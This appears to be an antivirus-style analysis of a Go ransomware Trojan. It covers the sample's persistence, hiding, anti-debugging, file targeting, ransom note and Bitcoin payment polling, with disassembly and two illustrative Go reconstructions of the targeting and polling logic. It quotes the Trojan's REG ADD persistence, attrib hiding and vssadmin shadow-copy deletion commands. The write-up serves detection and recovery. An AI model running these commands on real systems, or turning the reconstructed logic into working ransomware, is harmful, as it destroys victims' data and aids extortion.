SHA1:
- 3218c04576b08ed65530086a41659b51902fce51
A ransomware Trojan written in Go. Once launched, it performs the following actions:
1. Determines the name of its own executable file and checks whether it is "Windows_Security.exe". If it is, the Trojan skips to step 6.
2. Removes the folder %APPDATA%\Windows_Update.
3. Creates the folder %APPDATA%\Windows_Update.
4. Copies itself to %APPDATA%\Windows_Update under the name Windows_Security.exe.
5. Deletes the original executable file and runs %APPDATA%\Windows_Update\Windows_Security.exe. The original process then terminates.
6. If the folder from which the Trojan was launched is not named Windows_Update, the installation is aborted.
7. Establishes persistence through the HKCU Run key by executing the command
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Windows-Defender /t REG_SZ /F /D %APPDATA%\Windows_Update\Windows_Security.exe
8. Hides its folder and executable by executing the following commands (the command strings are stored in the binary Base64-encoded, not encrypted):
attrib +H +S %APPDATA%\Windows_Update\
attrib +H +S %APPDATA%\Windows_Update\Windows_Security.exe
9. Copies itself to the temporary folder as %TEMP%\Windows_Security.exe and terminates.
Encryption is performed by the copy launched from %TEMP%. Before the installer exits, it calls one more function, which runs a delay loop (main_LongLoop), increments a counter and then checks for a debugger (main_CheckDebugger, which calls IsDebuggerPresent), a basic anti-analysis measure:
.text:00000000004021E0 main_BypassAV proc near ; CODE XREF: main_Install:loc_401F02p
.text:00000000004021E0 ; main_BypassAV+38j
.text:00000000004021E0 mov rcx, gs:28h
.text:00000000004021E9 mov rcx, [rcx+0]
.text:00000000004021F0 cmp rsp, [rcx+10h]
.text:00000000004021F4 jbe short loc_402213
.text:00000000004021F6 call main_LongLoop
.text:00000000004021FB mov rax, cs:some_counter
.text:0000000000402202 add rax, 0Bh
.text:0000000000402206 mov cs:some_counter, rax
.text:000000000040220D call main_CheckDebugger <- calls IsDebuggerPresent
.text:0000000000402212 retn
.text:0000000000402213 ; ---------------------------------------------------------------------------
.text:0000000000402213
.text:0000000000402213 loc_402213: ; CODE XREF: main_BypassAV+14j
.text:0000000000402213 call runtime_morestack_noctxt
.text:0000000000402218 jmp short main_BypassAV
.text:0000000000402218 main_BypassAV endp
Once installed, the Trojan deletes all Volume Shadow Copies, removing the simplest local recovery path, with the command:
"vssadmin.exe Delete Shadows /All /Quiet"
The Trojan then reads the following registry values:
HKLM\Software\Policis\done
HKCU\Software\Policis\done
If either value is True, no encryption is performed. Otherwise the Trojan generates an encryption key and starts encrypting files:
.text:0000000000402403 loc_402403: ; CODE XREF: main_main+17Bj
.text:0000000000402403 mov byte ptr [rsp], 1
.text:0000000000402407 call main_EncryptExternalDrives
.text:000000000040240C lea rax, aC ; "C:\\"
.text:0000000000402413 mov [rsp], rax
.text:0000000000402417 mov qword ptr [rsp+8], 3
.text:0000000000402420 mov byte ptr [rsp+10h], 1
.text:0000000000402425 call main_EncryptDocumets
.text:000000000040242A call main_WriteRegDone
.text:000000000040242F call main_PromtPay
.text:0000000000402434 call main_ListenForPayment
.text:0000000000402439 mov rbp, [rsp+78h]
.text:000000000040243E add rsp, 80h
.text:0000000000402445 retn
The main_WriteRegDone function then writes the done marker to the same registry locations, HKLM\Software\Policis\done and HKCU\Software\Policis\done, that were checked before encryption started, so that relaunching the Trojan does not encrypt the files a second time.
The EncryptDocumets function looks as follows:
.text:0000000000401040 main_EncryptDocumets proc near ; CODE XREF: main_EncryptDocumets+86j
.text:0000000000401040 ; main_main+145p ...
.text:0000000000401040
.text:0000000000401040 var_30 = qword ptr -30h
.text:0000000000401040 var_28 = qword ptr -28h
.text:0000000000401040 var_20 = qword ptr -20h
.text:0000000000401040 var_8 = qword ptr -8
.text:0000000000401040 arg_0 = qword ptr 8
.text:0000000000401040 arg_8 = qword ptr 10h
.text:0000000000401040 arg_10 = byte ptr 18h
.text:0000000000401040
.text:0000000000401040 mov rcx, gs:28h
.text:0000000000401049 mov rcx, [rcx+0]
.text:0000000000401050 cmp rsp, [rcx+10h]
.text:0000000000401054 jbe short loc_4010C1
.text:0000000000401056 sub rsp, 30h
.text:000000000040105A mov [rsp+30h+var_8], rbp
.text:000000000040105F lea rbp, [rsp+30h+var_8]
.text:0000000000401064 movzx eax, [rsp+30h+arg_10]
.text:0000000000401069 test al, al
.text:000000000040106B jz short loc_40109B
.text:000000000040106D mov rax, [rsp+30h+arg_0]
.text:0000000000401072 mov [rsp], rax
.text:0000000000401076 mov rax, [rsp+30h+arg_8]
.text:000000000040107B mov [rsp+8], rax
.text:0000000000401080 lea rax, encrypt
.text:0000000000401087 mov [rsp+10h], rax
.text:000000000040108C call path_filepath_Walk
.text:0000000000401091
.text:0000000000401091 loc_401091: ; CODE XREF: main_EncryptDocumets+7Fj
.text:0000000000401091 mov rbp, [rsp+30h+var_8]
.text:0000000000401096 add rsp, 30h
.text:000000000040109A retn
.text:000000000040109B ; ---------------------------------------------------------------------------
.text:000000000040109B
.text:000000000040109B loc_40109B: ; CODE XREF: main_EncryptDocumets+2Bj
.text:000000000040109B mov rax, [rsp+30h+arg_0]
.text:00000000004010A0 mov [rsp], rax
.text:00000000004010A4 mov rax, [rsp+30h+arg_8]
.text:00000000004010A9 mov [rsp+8], rax
.text:00000000004010AE lea rax, decrypt
.text:00000000004010B5 mov [rsp+10h], rax
.text:00000000004010BA call path_filepath_Walk
.text:00000000004010BF jmp short loc_401091
.text:00000000004010C1 ; ---------------------------------------------------------------------------
.text:00000000004010C1
.text:00000000004010C1 loc_4010C1: ; CODE XREF: main_EncryptDocumets+14j
.text:00000000004010C1 call runtime_morestack_noctxt
.text:00000000004010C6 jmp main_EncryptDocumets
The byte argument arg_10 selects the mode: a non-zero value passes the encrypt callback to path_filepath_Walk, zero passes the decrypt callback.
The Go standard library function path/filepath.Walk (path_filepath_Walk) calls the supplied callback for every file and directory under the root; the two callbacks are:
.text:0000000000684058 decrypt dq offset main_VisitD ; DATA XREF: main_EncryptDocumets+6Eo
.text:0000000000684060 encrypt dq offset main_Visit ; DATA XREF: main_EncryptDocumets+40
The main_Visit function checks whether the file path contains any of the following strings:
tmp
winnt
Application Data
AppData
Program Files (x86)
Program Files
temp
thumbs.db
Recycle.Bin
System Volume Information
Boot
Windows
.enc
Instructions
Windows_Security.exe
If any of them is present, the file is not encrypted. The Trojan encrypts 140 file types, selected by extension. Trojan.Encoder.6491 encodes the original file name with Base64 and appends the .enc extension to the encrypted file.
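To make the target-selection and renaming logic concrete, the following Go program (an added example written for this page, not code recovered from the Trojan) reproduces what main_Visit and the .enc renaming do without writing anything encrypted: it applies the exclusion list above to each path, filters by extension, and shows the Base64 filename transformation together with its inverse, which is what a recovery tool needs in order to restore original names. Assumptions not stated on the page: the substring match is case-sensitive against the full path, the Base64 alphabet is the standard one (the decoder also tries the URL-safe alphabet), the encoded name covers the whole original base name including its extension, and targetExt is a small stand-in for the 140 targeted extensions.

```go
package main

import (
	"encoding/base64"
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// skipMarkers is the main_Visit exclusion list from the page; a path containing any of them is left alone.
var skipMarkers = []string{
	"tmp", "winnt", "Application Data", "AppData", "Program Files (x86)", "Program Files",
	"temp", "thumbs.db", "Recycle.Bin", "System Volume Information", "Boot", "Windows",
	".enc", "Instructions", "Windows_Security.exe",
}

// targetExt is an assumed stand-in for the 140 targeted extensions, which the page does not list.
var targetExt = map[string]bool{".doc": true, ".docx": true, ".xls": true, ".jpg": true, ".pdf": true, ".txt": true}

// shouldSkip mirrors the main_Visit check. Assumption: case-sensitive substring match on the full path.
func shouldSkip(path string) bool {
	for _, m := range skipMarkers {
		if strings.Contains(path, m) {
			return true
		}
	}
	return false
}

func isTarget(path string) bool { return targetExt[strings.ToLower(filepath.Ext(path))] }

// encodedName builds the name an encrypted file receives: Base64 of the original base name plus ".enc".
// Assumption: standard Base64 alphabet over the whole base name, extension included.
func encodedName(name string) string {
	return base64.StdEncoding.EncodeToString([]byte(name)) + ".enc"
}

// originalName reverses encodedName, trying both the standard and the URL-safe alphabet because the
// page does not say which one the Trojan uses.
func originalName(encName string) (string, error) {
	if !strings.HasSuffix(encName, ".enc") {
		return "", errors.New("not an .enc file")
	}
	b64 := strings.TrimSuffix(encName, ".enc")
	for _, enc := range []*base64.Encoding{base64.StdEncoding, base64.URLEncoding} {
		if raw, err := enc.DecodeString(b64); err == nil {
			return string(raw), nil
		}
	}
	return "", fmt.Errorf("cannot decode %q as Base64", b64)
}

// selectTargets walks root the way main_EncryptDocumets drives path_filepath_Walk and returns the files
// the Trojan would encrypt, without modifying anything.
func selectTargets(root string) ([]string, error) {
	var out []string
	err := filepath.Walk(root, func(path string, info os.FileInfo, err error) error {
		if err != nil {
			return nil // assumption: unreadable entries are skipped rather than aborting the walk
		}
		if info.IsDir() || shouldSkip(path) || !isTarget(path) {
			return nil
		}
		out = append(out, path)
		return nil
	})
	return out, err
}

func main() {
	// Constructed sample tree under the working directory (a /tmp path would itself match the "tmp" marker).
	root, err := os.MkdirTemp(".", "enc6491-")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(root)
	for _, rel := range []string{"Docs/report.docx", "Docs/Instructions.html", "Docs/old.docx.enc", "Windows/system.ini", "Pics/cat.jpg"} {
		p := filepath.Join(root, rel)
		_ = os.MkdirAll(filepath.Dir(p), 0o755)
		_ = os.WriteFile(p, []byte("sample"), 0o644)
	}
	targets, _ := selectTargets(root)
	for _, t := range targets {
		fmt.Println("would encrypt:", t, "->", encodedName(filepath.Base(t)))
	}
	name, _ := originalName("cmVwb3J0LmRvY3g=.enc")
	fmt.Println("recovered original name:", name)
}
```

Two points worth noticing when reading the list above through this code: the ".enc", "Instructions" and "Windows_Security.exe" markers stop the Trojan from re-encrypting its own output, its ransom note and its own executable, and because the match is a plain substring test on the whole path, any directory whose name happens to contain "tmp", "temp" or "Boot" is also spared.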
The Trojan then saves the ransom note as %USERPROFILE%\Desktop\Instructions.html, opens it in a browser window, and executes the following command:
msg * All your files have been encrypted, read the note in your Desktop
The main_ListenForPayment function checks the balance of the attackers' Bitcoin wallet by requesting the page
http://btc.blockr.io/api/v1/address/info/1Bww**************Yph9SxP
An example of the blockr.io API's reply:
{"status":"success","data":{"address":"1Bww**************Yph9SxP ","is_unknown":true,"balance":0,"balance_multisig":0,"totalreceived":0,"nb_txs":0,"first_tx":null,"last_tx":null,"is_valid":true},"code":200,"message":""}
The JSON reply is unmarshalled into an internal structure. The requests are repeated at fixed intervals; when the Trojan sees that the wallet balance has increased, it decrypts all the encrypted files using a built-in decryption routine. Since decryption runs locally and no key exchange with a server is involved, the key material must be present on the infected machine.
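The polling logic can be expressed as follows in Go (an added example for this page, not the Trojan's own code). It decodes the reply format shown above into a struct, treats any non-zero balance as payment, and drives the poll loop through an injected fetch function so it runs offline; the first canned reply is the page's sample (balance 0) and the second, with a balance of 0.5, is constructed to show the trigger. The real sample issues HTTP GETs to the blockr.io URL at fixed intervals; neither the interval nor the payment threshold is stated on the page, so "balance > 0" is an assumption.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
)

// blockrReply mirrors the fields of the address/info reply shown on the page; fields such as
// first_tx and balance_multisig are ignored by the decoder.
type blockrReply struct {
	Status string `json:"status"`
	Data   struct {
		Address       string  `json:"address"`
		IsUnknown     bool    `json:"is_unknown"`
		Balance       float64 `json:"balance"`
		TotalReceived float64 `json:"totalreceived"`
		NbTxs         int     `json:"nb_txs"`
		IsValid       bool    `json:"is_valid"`
	} `json:"data"`
	Code    int    `json:"code"`
	Message string `json:"message"`
}

// parseReply decodes one reply and rejects anything that is not a successful lookup.
func parseReply(body []byte) (*blockrReply, error) {
	var r blockrReply
	if err := json.Unmarshal(body, &r); err != nil {
		return nil, err
	}
	if r.Status != "success" || r.Code != 200 {
		return nil, fmt.Errorf("lookup failed: status=%q code=%d message=%q", r.Status, r.Code, r.Message)
	}
	return &r, nil
}

// paymentReceived is the decision the polling loop makes.
// Assumption: any non-zero balance counts; the page does not state the amount demanded.
func paymentReceived(r *blockrReply) bool {
	return r.Data.Balance > 0
}

// pollUntilPaid runs the loop with an injected fetch function so it can run offline. The real
// Trojan performs an HTTP GET against the blockr.io URL on each iteration and sleeps between polls.
// It returns whether payment was seen and on which poll.
func pollUntilPaid(fetch func() ([]byte, error), maxPolls int) (bool, int, error) {
	for i := 1; i <= maxPolls; i++ {
		body, err := fetch()
		if err != nil {
			continue // transport error: keep polling, as a persistent loop would
		}
		r, err := parseReply(body)
		if err != nil {
			continue // malformed or failed lookup: keep polling
		}
		if paymentReceived(r) {
			return true, i, nil
		}
	}
	return false, maxPolls, errors.New("no payment observed")
}

// sampleReplies are constructed: the first is the page's sample reply, the second is a hypothetical
// reply after one incoming transaction.
var sampleReplies = [][]byte{
	[]byte(`{"status":"success","data":{"address":"1Bww**************Yph9SxP","is_unknown":true,"balance":0,"balance_multisig":0,"totalreceived":0,"nb_txs":0,"first_tx":null,"last_tx":null,"is_valid":true},"code":200,"message":""}`),
	[]byte(`{"status":"success","data":{"address":"1Bww**************Yph9SxP","is_unknown":false,"balance":0.5,"balance_multisig":0,"totalreceived":0.5,"nb_txs":1,"first_tx":null,"last_tx":null,"is_valid":true},"code":200,"message":""}`),
}

// replayFetcher hands out the canned replies in order and fails once they are exhausted.
func replayFetcher(replies [][]byte) func() ([]byte, error) {
	i := 0
	return func() ([]byte, error) {
		if i >= len(replies) {
			return nil, errors.New("no more canned replies")
		}
		b := replies[i]
		i++
		return b, nil
	}
}

func main() {
	paid, polls, err := pollUntilPaid(replayFetcher(sampleReplies), 5)
	fmt.Println("paid:", paid, "after polls:", polls, "err:", err)
}
```

From a response standpoint the useful consequence is that the only network indicator of this sample is periodic GET traffic to btc.blockr.io for a fixed address, which is easy to alert on, and that the decision to decrypt is made entirely client-side from the parsed balance field.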
Files compromised by this Trojan can be decrypted.